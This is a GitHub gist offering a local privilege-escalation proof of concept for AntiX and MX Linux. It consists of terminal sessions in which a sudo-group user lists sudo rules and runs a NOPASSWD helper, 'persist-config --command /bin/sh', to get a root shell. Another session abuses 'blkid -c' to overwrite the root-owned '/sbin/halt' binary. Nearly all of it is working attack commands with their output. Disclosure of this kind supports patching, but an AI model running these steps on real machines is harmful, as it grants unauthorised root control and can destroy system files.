Skip to content

Instantly share code, notes, and snippets.

@bash-c

bash-c/AntiX-exp.sh

Last active Mar 19, 2020
Star
Embed
What would you like to do?
Learn more about clone URLs
Download ZIP
LPE exploit of AntiX/MX Linux
Raw
AntiX-exp.sh
# OS version
m4x@antix1:~
$ cat /etc/issue
Welcome to antiX. Powered by Debian.
m4x@antix1:~
$ uname -a
Linux antix1 4.9.193-antix.1-amd64-smp #1 SMP PREEMPT Fri Sep 20 20:30:09 BST 2019 x86_64 GNU/Linux
m4x@antix1:~
$ lsb_release -a
No LSB modules are available.
Distributor ID: Debian
Description: Debian GNU/Linux 10 (buster)
Release: 10
Codename: buster
# exploit
m4x@antix1:~
$ id
uid=1000(m4x) gid=1000(m4x) groups=1000(m4x),7(lp),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),109(netdev),112(lpadmin),113(scanner),114(vboxsf)
m4x@antix1:~
$ sudo -l
Matching Defaults entries for m4x on antix1:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
!requiretty, !tty_tickets
Runas and Command-specific defaults for m4x:
Defaults!/usr/local/bin/menu_manager.sh env_keep+=HOME
User m4x may run the following commands on antix1:
(ALL : ALL) ALL
(root) NOPASSWD: /sbin/halt
(root) NOPASSWD: /sbin/poweroff
(root) NOPASSWD: /sbin/reboot
(root) NOPASSWD: /sbin/blkid
(root) NOPASSWD: /sbin/fdisk.distrib
(root) NOPASSWD: /usr/bin/ceni
(root) NOPASSWD: /usr/local/bin/persist-config <==== bug here
(root) NOPASSWD: /usr/local/bin/persist-save
(root) NOPASSWD: /usr/sbin/minstall
(root) NOPASSWD: /usr/local/bin/antixsources.sh
(root) NOPASSWD: /usr/local/bin/connectshares.sh
(root) NOPASSWD: /usr/local/bin/disconnectshares.sh
(root) NOPASSWD: /bin/chvt
(root) NOPASSWD: /usr/local/bin/menu_manager.sh
(root) NOPASSWD: /usr/sbin/pm-hibernate
(root) NOPASSWD: /usr/sbin/pm-suspend
(root) NOPASSWD: /usr/local/bin/update-default-desktop
m4x@antix1:~
$ sudo /usr/local/bin/persist-config --command /bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
#
Raw
AntiX_MXLinux_Poc.sh
m4x@mx:~/Desktop
$ sudo -l
Matching Defaults entries for m4x on mx:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, !requiretty,
!tty_tickets
Runas and Command-specific defaults for m4x:
Defaults!/usr/local/bin/menu_manager.sh env_keep+=HOME
User m4x may run the following commands on mx:
(ALL : ALL) ALL
(root) NOPASSWD: /sbin/halt
(root) NOPASSWD: /sbin/poweroff
(root) NOPASSWD: /sbin/reboot
(root) NOPASSWD: /sbin/blkid
(root) NOPASSWD: /sbin/fdisk.distrib
(root) NOPASSWD: /usr/bin/ceni
(root) NOPASSWD: /usr/local/bin/persist-config
(root) NOPASSWD: /usr/local/bin/persist-save
(root) NOPASSWD: /usr/sbin/minstall
(root) NOPASSWD: /usr/local/bin/antixsources.sh
(root) NOPASSWD: /usr/local/bin/connectshares.sh
(root) NOPASSWD: /usr/local/bin/disconnectshares.sh
(root) NOPASSWD: /bin/chvt
(root) NOPASSWD: /usr/local/bin/menu_manager.sh
(root) NOPASSWD: /usr/sbin/pm-hibernate
(root) NOPASSWD: /usr/sbin/pm-suspend
(root) NOPASSWD: /usr/local/bin/update-default-desktop
(root) NOPASSWD: /usr/lib/mx-tweak/backlight-brightness
m4x@mx:~/Desktop
$ ls -l /sbin/halt
-rwxr-xr-x 1 root root 18888 Feb 14 2019 /sbin/halt
m4x@mx:~/Desktop
$ sudo /sbin/blkid -c /sbin/halt
/dev/sr0: UUID="2019-06-13-05-24-38-00" LABEL="VMware Tools" TYPE="iso9660"
/dev/sda1: LABEL="rootMX19" UUID="b347b443-e474-4afd-97bc-bc91f180e7c5" TYPE="ext4" PARTUUID="b46d7286-01"
/dev/sda2: LABEL="swapMX" UUID="9933b310-575c-4caa-a335-79b165ee7d89" TYPE="swap" PARTUUID="b46d7286-02"
m4x@mx:~/Desktop
$ sudo cat /sbin/halt
<device DEVNO="0x0b00" TIME="1584329636.32005" UUID="2019-06-13-05-24-38-00" LABEL="VMware Tools" TYPE="iso9660">/dev/sr0</device>
<device DEVNO="0x0801" TIME="1584329636.35739" LABEL="rootMX19" UUID="b347b443-e474-4afd-97bc-bc91f180e7c5" TYPE="ext4" PARTUUID="b46d7286-01">/dev/sda1</device>
<device DEVNO="0x0802" TIME="1584329636.38616" LABEL="swapMX" UUID="9933b310-575c-4caa-a335-79b165ee7d89" TYPE="swap" PARTUUID="b46d7286-02">/dev/sda2</device>
Raw
MX-exp.sh
# OS version
m4x@M4x-PC:~
$ screenfetch
_,met$$$$$gg. m4x@M4x-PC
,g$$$$$$$$$$$$$$$P. OS: Debian 10 buster
,g$$P"" """Y$$.". Kernel: x86_64 Linux 4.19.0-6-amd64
,$$P' `$$$. Uptime: 25m
',$$P ,ggs. `$$b: Packages: 1970
`d$$' ,$P"' . $$$ Shell: bash 5.0.3
$$P d$' , $$P Resolution: 3838x1819
$$: $$. - ,d$$' DE: XFCE
$$\; Y$b._ _,d$P' WM: Xfwm4
Y$$. `.`"Y$$$$P"' WM Theme: Arc-Dark
`$$b "-.__ GTK Theme: Greybird-mx [GTK2]
`Y$$ Icon Theme: Papirus
`Y$$. Font: Noto Sans 10.5
`$$b. CPU: Intel Core i7-8650U @ 2.112GHz
`Y$$b. GPU: llvmpipe (LLVM 7.0, 256 bits)
`"Y$b._ RAM: 832MiB / 1970MiB
`""""
m4x@M4x-PC:~
$ cat /etc/issue
Welcome to MX Linux! Powered by Debian.
# exploit
m4x@M4x-PC:~
$ id
uid=1000(m4x) gid=1000(m4x) groups=1000(m4x),7(lp),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),109(netdev),111(lpadmin),118(scanner),125(vboxsf)
m4x@M4x-PC:~
$ sudo -l
Matching Defaults entries for m4x on M4x-PC:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, !requiretty,
!tty_tickets
Runas and Command-specific defaults for m4x:
Defaults!/usr/local/bin/menu_manager.sh env_keep+=HOME
User m4x may run the following commands on M4x-PC:
(ALL : ALL) ALL
(root) NOPASSWD: /sbin/halt
(root) NOPASSWD: /sbin/poweroff
(root) NOPASSWD: /sbin/reboot
(root) NOPASSWD: /sbin/blkid
(root) NOPASSWD: /sbin/fdisk.distrib
(root) NOPASSWD: /usr/bin/ceni
(root) NOPASSWD: /usr/local/bin/persist-config <======= bug here
(root) NOPASSWD: /usr/local/bin/persist-save
(root) NOPASSWD: /usr/sbin/minstall
(root) NOPASSWD: /usr/local/bin/antixsources.sh
(root) NOPASSWD: /usr/local/bin/connectshares.sh
(root) NOPASSWD: /usr/local/bin/disconnectshares.sh
(root) NOPASSWD: /bin/chvt
(root) NOPASSWD: /usr/local/bin/menu_manager.sh
(root) NOPASSWD: /usr/sbin/pm-hibernate
(root) NOPASSWD: /usr/sbin/pm-suspend
(root) NOPASSWD: /usr/local/bin/update-default-desktop
m4x@M4x-PC:~
$ sudo /usr/local/bin/persist-config --command /bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
#
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment